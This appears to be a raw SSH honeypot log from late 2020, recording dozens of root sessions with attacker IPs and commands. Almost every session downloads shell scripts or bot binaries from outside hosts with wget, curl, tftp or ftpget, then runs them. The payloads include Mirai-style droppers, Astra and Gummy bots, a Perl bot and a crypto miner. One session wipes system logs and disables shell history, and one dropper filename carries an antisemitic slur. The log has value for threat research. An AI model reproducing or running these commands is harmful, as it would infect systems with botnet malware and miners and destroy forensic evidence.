chmod +x yoyobins.sh
sh yoyobins.sh

From 35.246.97.170 28-Nov-2020 18:54:51 ssh2 root
Exec cat /etc/issue ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl ; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 sploit.x86; rm -rf Astra.x86; history -c ; wget http://45.145.185.74/bins/Astra.mips; chmod 777 Astra.mips; ./Astra.mips sploit.mips; rm -rf Astra.mips; history -c ; wget http://45.145.185.74/bins/Astra.arm5; chmod 777 Astra.arm5; ./Astra.arm5 sploit.arm5; rm -rf Astra.arm5; history -c ; wget http://45.145.185.74/bins/Astra.arm7; chmod 777 Astra.arm7; ./Astra.arm7 sploit.arm7; rm -rf Astra.arm7; history -c
cat /etc/issue
wget 119.147.213.57/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 119.147.213.57/bot.pl
perl bot.pl
history -c
rm -rf bot.pl
wget http://45.145.185.74/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 sploit.x86
rm -rf Astra.x86
history -c
wget http://45.145.185.74/bins/Astra.mips
chmod 777 Astra.mips
./Astra.mips sploit.mips
rm -rf Astra.mips
history -c
wget http://45.145.185.74/bins/Astra.arm5
chmod 777 Astra.arm5
./Astra.arm5 sploit.arm5
rm -rf Astra.arm5
history -c
wget http://45.145.185.74/bins/Astra.arm7
chmod 777 Astra.arm7
./Astra.arm7 sploit.arm7
rm -rf Astra.arm7
history -c

From 195.58.38.220 29-Nov-2020 05:52:43 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Heisenbergbins.sh; chmod 777 Heisenbergbins.sh; sh Heisenbergbins.sh; tftp 104.168.195.213 -c get Heisenbergtftp1.sh; chmod 777 Heisenbergtftp1.sh; sh Heisenbergtftp1.sh; tftp -r Heisenbergtftp2.sh -g 104.168.195.213; chmod 777 Heisenbergtftp2.sh; sh Heisenbergtftp2.sh; rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.195.213/Heisenbergbins.sh
chmod 777 Heisenbergbins.sh
sh Heisenbergbins.sh
tftp 104.168.195.213 -c get Heisenbergtftp1.sh
chmod 777 Heisenbergtftp1.sh
sh Heisenbergtftp1.sh
tftp -r Heisenbergtftp2.sh -g 104.168.195.213
chmod 777 Heisenbergtftp2.sh
sh Heisenbergtftp2.sh
rm -rf Heisenbergbins.sh Heisenbergtftp1.sh Heisenbergtftp2.sh
rm -rf *

From 2.57.122.195 29-Nov-2020 14:21:32 ssh2 root
Exec nc 1 1; cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig;
nc 1 1
cat /etc/issue
wget https://nasapaul.com/cnrig
./cnrig

From 188.166.161.246 30-Nov-2020 11:45:23 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.42/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 45.14.224.42 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 45.14.224.42; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.42/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 45.14.224.42 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 45.14.224.42
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 68.183.223.13 30-Nov-2020 18:25:13 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.156/Rubybins.sh; chmod 777 Rubybins.sh; sh Rubybins.sh; tftp 45.14.224.156 -c get Rubytftp1.sh; chmod 777 Rubytftp1.sh; sh Rubytftp1.sh; tftp -r Rubytftp2.sh -g 45.14.224.156; chmod 777 Rubytftp2.sh; sh Rubytftp2.sh; rm -rf Rubybins.sh Rubytftp1.sh Rubytftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.156/Rubybins.sh
chmod 777 Rubybins.sh
sh Rubybins.sh
tftp 45.14.224.156 -c get Rubytftp1.sh
chmod 777 Rubytftp1.sh
sh Rubytftp1.sh
tftp -r Rubytftp2.sh -g 45.14.224.156
chmod 777 Rubytftp2.sh
sh Rubytftp2.sh
rm -rf Rubybins.sh Rubytftp1.sh Rubytftp2.sh
rm -rf *

From 174.138.15.222 1-Dec-2020 06:07:00 ssh2 root
Exec rm -rf Astra.x86*; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://45.145.185.74/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 46.101.206.127 1-Dec-2020 13:32:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://158.69.36.13/ghoul.sh; chmod 777 ghoul.sh; sh ghoul.sh; tftp 158.69.36.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 158.69.36.13; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 158.69.36.13 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://158.69.36.13/ghoul.sh
chmod 777 ghoul.sh
sh ghoul.sh
tftp 158.69.36.13 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 158.69.36.13
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 158.69.36.13 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 112.119.28.92 1-Dec-2020 23:44:23 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://10.197.136.1/wget.sh || curl http://10.197.136.1/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://10.197.136.1/wget.sh || curl http://10.197.136.1/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 88.218.16.43 2-Dec-2020 01:02:11 ssh2 root
Exec wget http://88.218.16.43/we.sh; curl -O http://88.218.16.43/we.sh; chmod 777 we.sh; sh we.sh
wget http://88.218.16.43/we.sh
curl -O http://88.218.16.43/we.sh
chmod 777 we.sh
sh we.sh

From 174.138.15.222 2-Dec-2020 02:00:42 ssh2 root
Exec rm -rf Astra.x86*; wget http://37.46.150.249/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://37.46.150.249/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 46.101.224.92 2-Dec-2020 04:52:29 ssh2 root
Exec wget http://45.14.224.170/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 45.14.224.170 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 45.14.224.170; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf *
wget http://45.14.224.170/ytbins.sh
chmod 777 ytbins.sh
sh ytbins.sh
tftp 45.14.224.170 -c get yttftp1.sh
chmod 777 yttftp1.sh
sh yttftp1.sh
tftp -r yttftp2.sh -g 45.14.224.170
chmod 777 yttftp2.sh
sh yttftp2.sh
rm -rf ytbins.sh yttftp1.sh yttftp2.sh
rm -rf *

From 161.35.152.224 3-Dec-2020 13:00:45 ssh2 root
Exec rm -rf Astra.x86*; wget http://37.46.150.185/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://37.46.150.185/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 178.62.231.117 4-Dec-2020 05:15:31 ssh2 root
Exec rm -rf Astra.x86*; wget http://192.210.170.111/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://192.210.170.111/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 89.249.73.140 4-Dec-2020 15:19:45 ssh2 root
w
arp -a
last
ps -x

From 157.245.253.44 4-Dec-2020 16:41:17 ssh2 root
Exec cat /etc/issue ; wget 46.249.32.140/bins/Gummy.x86 ; curl -O 46.249.32.140/bins/Gummy.x86 ; chmod 777 Gummy.x86 ; ./Gummy.x86 0day.autoroot.x86 ; wget 46.249.32.140/bins/Gummy.mips ; curl -O 46.249.32.140/bins/Gummy.mips ; chmod 777 Gummy.mips ; ./Gummy.mips otherbinexecxdlmfao ; wget 46.249.32.140/bins/Gummy.arm ; curl -O 46.249.32.140/bins/Gummy.arm ; chmod 777 Gummy.arm ; ./Gummy.arm 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm5 ; curl -O 46.249.32.140/bins/Gummy.arm5 ; chmod 777 Gummy.arm5 ; ./Gummy.arm5 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm6 ; curl -O 46.249.32.140/bins/Gummy.arm6 ; chmod 777 Gummy.arm6 ; ./Gummy.arm6 0day.autoroot ; wget 46.249.32.140/bins/Gummy.arm7 ; curl -O 46.249.32.140/bins/Gummy.arm7 ; chmod 777 Gummy.arm7 ; ./Gummy.arm7 0day.autoroot ; wget 46.249.32.140/bins/ ; curl -O 46.249.32.140/bins/ ; chmod 777  ; ./ 0day.autoroot ; wget 46.249.32.140/bins/ ; curl -O 46.249.32.140/bins/ ; chmod 777  ; ./ 0day.autoroot
cat /etc/issue
wget 46.249.32.140/bins/Gummy.x86
curl -O 46.249.32.140/bins/Gummy.x86
chmod 777 Gummy.x86
./Gummy.x86 0day.autoroot.x86
wget 46.249.32.140/bins/Gummy.mips
curl -O 46.249.32.140/bins/Gummy.mips
chmod 777 Gummy.mips
./Gummy.mips otherbinexecxdlmfao
wget 46.249.32.140/bins/Gummy.arm
curl -O 46.249.32.140/bins/Gummy.arm
chmod 777 Gummy.arm
./Gummy.arm 0day.autoroot
wget 46.249.32.140/bins/Gummy.arm5
curl -O 46.249.32.140/bins/Gummy.arm5
chmod 777 Gummy.arm5
./Gummy.arm5 0day.autoroot
wget 46.249.32.140/bins/Gummy.arm6
curl -O 46.249.32.140/bins/Gummy.arm6
chmod 777 Gummy.arm6
./Gummy.arm6 0day.autoroot
wget 46.249.32.140/bins/Gummy.arm7
curl -O 46.249.32.140/bins/Gummy.arm7
chmod 777 Gummy.arm7
./Gummy.arm7 0day.autoroot
wget 46.249.32.140/bins/
curl -O 46.249.32.140/bins/
chmod 777
./ 0day.autoroot
wget 46.249.32.140/bins/
curl -O 46.249.32.140/bins/
chmod 777
./ 0day.autoroot

From 35.204.166.214 7-Dec-2020 16:13:01 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.170.111/bins.sh; curl -O http://192.210.170.111/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.210.170.111 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r bins2.sh -g 192.210.170.111; chmod 777 bins2.sh; sh bins2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.210.170.111 bins1.sh bins1.sh; sh bins1.sh; rm -rf bins.sh bins.sh bins2.sh bins1.sh; rm -rf * ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.210.170.111/bins.sh
curl -O http://192.210.170.111/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 192.210.170.111 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r bins2.sh -g 192.210.170.111
chmod 777 bins2.sh
sh bins2.sh
ftpget -v -u anonymous -p anonymous -P 21 192.210.170.111 bins1.sh bins1.sh
sh bins1.sh
rm -rf bins.sh bins.sh bins2.sh bins1.sh
rm -rf *
wget 119.147.213.57/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 119.147.213.57/bot.pl
perl bot.pl
history -c

From 159.89.14.213 9-Dec-2020 02:23:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.36.161/sh; curl -O http://172.245.36.161/sh; chmod 777 sh; sh sh; tftp 172.245.36.161 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 172.245.36.161; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.36.161 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://172.245.36.161/sh
curl -O http://172.245.36.161/sh
chmod 777 sh
sh sh
tftp 172.245.36.161 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 172.245.36.161
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 172.245.36.161 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 107.173.181.20 9-Dec-2020 07:56:16 ssh2 root
Exec cd /tmp; wget http://192.3.251.67/bins/Ares.x86; chmod 777 *; ./Ares.x86 roots; rm -rf * ; history -c
cd /tmp
wget http://192.3.251.67/bins/Ares.x86
chmod 777 *
./Ares.x86 roots
rm -rf *
history -c

From 157.230.119.220 10-Dec-2020 09:03:04 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://172.245.36.161/onionbins.sh; chmod 777 onionbins.sh; sh onionbins.sh; tftp 172.245.36.161 -c get oniontftp1.sh; chmod 777 oniontftp1.sh; sh oniontftp1.sh; tftp -r oniontftp2.sh -g 172.245.36.161; chmod 777 oniontftp2.sh; sh oniontftp2.sh; rm -rf onionbins.sh oniontftp1.sh oniontftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://172.245.36.161/onionbins.sh
chmod 777 onionbins.sh
sh onionbins.sh
tftp 172.245.36.161 -c get oniontftp1.sh
chmod 777 oniontftp1.sh
sh oniontftp1.sh
tftp -r oniontftp2.sh -g 172.245.36.161
chmod 777 oniontftp2.sh
sh oniontftp2.sh
rm -rf onionbins.sh oniontftp1.sh oniontftp2.sh
rm -rf *

From 45.148.10.28 13-Dec-2020 05:17:34 ssh2 root
Exec cat /etc/issue; pkill fri; pkill xmrig; pkill xmrigMiner; pkill cnrig;
cat /etc/issue
pkill fri
pkill xmrig
pkill xmrigMiner
pkill cnrig

From 157.230.109.54 13-Dec-2020 17:38:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.179.1/ghoul.sh; chmod 777 ghoul.sh; sh ghoul.sh; tftp 51.116.179.1 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 51.116.179.1; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.116.179.1/ghoul.sh
chmod 777 ghoul.sh
sh ghoul.sh
tftp 51.116.179.1 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 51.116.179.1
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf ghoul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 171.25.193.25 13-Dec-2020 17:47:40 ssh2 root
Exec ping 8.8.8.8
ping 8.8.8.8
Exec ping 8.8.8.8
ping 8.8.8.8

From 95.111.253.158 13-Dec-2020 18:12:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.212.150.241 /Corona.sh; curl -O http://91.212.150.241 /Corona.sh; chmod 777 Corona.sh; sh Corona.sh; tftp 91.212.150.241  -c get Corona2.sh; chmod 777 Corona2.sh; sh Corona2.sh; tftp -r Corona3.sh -g 91.212.150.241 ; chmod 777 Corona3.sh; sh Corona3.sh; ftpget -v -u anonymous -p anonymous -P 21 91.212.150.241  Corona4.sh Corona4.sh; sh Corona4.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.212.150.241 /Corona.sh
curl -O http://91.212.150.241 /Corona.sh
chmod 777 Corona.sh
sh Corona.sh
tftp 91.212.150.241 -c get Corona2.sh
chmod 777 Corona2.sh
sh Corona2.sh
tftp -r Corona3.sh -g 91.212.150.241
chmod 777 Corona3.sh
sh Corona3.sh
ftpget -v -u anonymous -p anonymous -P 21 91.212.150.241 Corona4.sh Corona4.sh
sh Corona4.sh
rm -rf *

From 207.154.207.48 14-Dec-2020 11:02:50 ssh2 root
Exec uname -a 
uname -a
Exec uname -a 
uname -a

From 35.230.158.225 14-Dec-2020 20:12:27 ssh2 root
Exec cat /etc/issue ; wget http://37.46.150.20/bins/Astra.x32; chmod 777 Astra.x32; ./Astra.x32 roots ; rm -rf Astra* ; history -c ; wget 119.147.213.57/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 119.147.213.57/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget http://37.46.150.20/bins/Astra.x32
chmod 777 Astra.x32
./Astra.x32 roots
rm -rf Astra*
history -c
wget 119.147.213.57/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 119.147.213.57/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 94.6.36.26 15-Dec-2020 23:35:19 ssh2 root
w
ls -laF

From 188.166.8.81 16-Dec-2020 11:59:09 ssh2 root
Exec rm -rf Astra.x86*; wget http://193.109.217.15/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://193.109.217.15/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 157.230.116.133 17-Dec-2020 00:23:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.103/awoo.sh; curl -O http://45.14.224.103/awoo.sh; chmod 777 awoo.sh; sh awoo.sh; tftp 45.14.224.103 -c get awoo.sh; chmod 777 awoo.sh; sh awoo.sh; tftp -r awoo2.sh -g 45.14.224.103; chmod 777 awoo2.sh; sh awoo2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 awoo1.sh awoo1.sh; sh awoo1.sh; rm -rf awoo.sh awoo.sh awoo2.sh awoo1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.103/awoo.sh
curl -O http://45.14.224.103/awoo.sh
chmod 777 awoo.sh
sh awoo.sh
tftp 45.14.224.103 -c get awoo.sh
chmod 777 awoo.sh
sh awoo.sh
tftp -r awoo2.sh -g 45.14.224.103
chmod 777 awoo2.sh
sh awoo2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.14.224.103 awoo1.sh awoo1.sh
sh awoo1.sh
rm -rf awoo.sh awoo.sh awoo2.sh awoo1.sh
rm -rf *

From 167.99.36.178 17-Dec-2020 03:19:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.116.179.1/sh; curl -O http://51.116.179.1/sh; chmod 777 sh; sh sh; tftp 51.116.179.1 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.116.179.1; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.116.179.1/sh
curl -O http://51.116.179.1/sh
chmod 777 sh
sh sh
tftp 51.116.179.1 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.116.179.1
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.116.179.1 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 89.249.73.139 18-Dec-2020 22:28:37 ssh2 root
cd /root
ls -a
cd .ssh
ls
cat test.pl
netstat -n
unset HISTFILE
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null
unset HISTFILE
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null
w
wget
cat /etc/issue
cat /etc/issue
wget 185.162.235.164/muh.tgz
scp

From 94.6.36.26 19-Dec-2020 15:39:21 ssh2 root
w
ls -laF
cat /etc/issue
nproc
lscpu
wget hell.fr.to/all/prv.tgz
curl -O hell.fr.to/all/prv.tgz
yum install curl
apt-get install curl
crl -O hell.fr.to/all/prv.tgz
reboot
kill -9 -1

From 51.89.107.21 20-Dec-2020 01:15:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.221.237.112/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 185.221.237.112 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.221.237.112; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.221.237.112 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.221.237.112/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 185.221.237.112 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 185.221.237.112
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.221.237.112 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 51.178.215.251 20-Dec-2020 20:30:24 ssh2 root
Exec wget http://37.46.150.184/we.sh; curl -O http://37.46.150.184/we.sh; chmod 777 we.sh; sh we.sh
wget http://37.46.150.184/we.sh
curl -O http://37.46.150.184/we.sh
chmod 777 we.sh
sh we.sh

From 45.148.10.54 21-Dec-2020 09:11:10 ssh2 root
Exec history
history

From 165.22.30.228 21-Dec-2020 09:43:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.188/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 185.10.68.188 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.188/Fourloko.sh
chmod 777 *
sh Fourloko.sh
tftp -g 185.10.68.188 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 167.71.76.221 21-Dec-2020 20:32:08 ssh2 root
Exec rm -rf Astra.x86*; wget http://37.46.150.160/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://37.46.150.160/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 roots
rm -rf Astra.x86

From 34.126.126.246 23-Dec-2020 05:28:58 ssh2 root
Exec cat /etc/issue ; cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://85.204.116.33/networkrip.sh; chmod 777 networkrip.sh; sh networkrip.sh; tftp 85.204.116.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 85.204.116.33; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cat /etc/issue
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://85.204.116.33/networkrip.sh
chmod 777 networkrip.sh
sh networkrip.sh
tftp 85.204.116.33 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 85.204.116.33
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.117.119.235 23-Dec-2020 07:15:12 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.61.43/bdExploit/exploit.x86_64; curl -O http://198.98.61.43/bdExploit/exploit.x86_64; cat exploit.x86_64 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86.BadWolf; wget http://198.98.61.43/bdExploit/exploit.x86; curl -O http://198.98.61.43/bdExploit/exploit.x86_64; cat exploit.x86 > 0x3a13a141f0; chmod +x *; ./0x3a13a141f0 Exploit.x86.BadWolf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.98.61.43/bdExploit/exploit.x86_64
curl -O http://198.98.61.43/bdExploit/exploit.x86_64
cat exploit.x86_64 > 0x3a13a141f0c
chmod +x *
./0x3a13a141f0c Exploit.x86.BadWolf
wget http://198.98.61.43/bdExploit/exploit.x86
curl -O http://198.98.61.43/bdExploit/exploit.x86_64
cat exploit.x86 > 0x3a13a141f0
chmod +x *
./0x3a13a141f0 Exploit.x86.BadWolf

From 35.226.178.145 23-Dec-2020 14:58:45 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget http://85.204.116.33/networkrip.sh; chmod 777 networkrip.sh; sh networkrip.sh; tftp 85.204.116.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 85.204.116.33; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cat /etc/issue
cd /tmp
wget http://85.204.116.33/networkrip.sh
chmod 777 networkrip.sh
sh networkrip.sh
tftp 85.204.116.33 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 85.204.116.33
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 64.225.51.64 23-Dec-2020 15:23:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.140.242.38/sh; curl -O http://104.140.242.38/sh; chmod 777 sh; sh sh; tftp 104.140.242.38 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 104.140.242.38; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 104.140.242.38 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.140.242.38/sh
curl -O http://104.140.242.38/sh
chmod 777 sh
sh sh
tftp 104.140.242.38 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 104.140.242.38
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 104.140.242.38 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *6

From 143.110.175.100 26-Dec-2020 01:41:42 ssh2 root
Exec id

id

From 46.101.18.129 27-Dec-2020 13:02:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://20.52.139.70/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 20.52.139.70 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 20.52.139.70; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://20.52.139.70/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 20.52.139.70 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 20.52.139.70
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.117.119.189 27-Dec-2020 16:26:38 ssh2 root
Exec cd /tmp || cd /; wget -q http://198.251.81.249/cometome; cat cometome > vegaiscoming; chmod +x vegaiscoming; ./vegaiscoming
cd /tmp || cd /
wget -q http://198.251.81.249/cometome
cat cometome > vegaiscoming
chmod +x vegaiscoming
./vegaiscoming

From 165.227.170.187 28-Dec-2020 14:56:02 ssh2 root
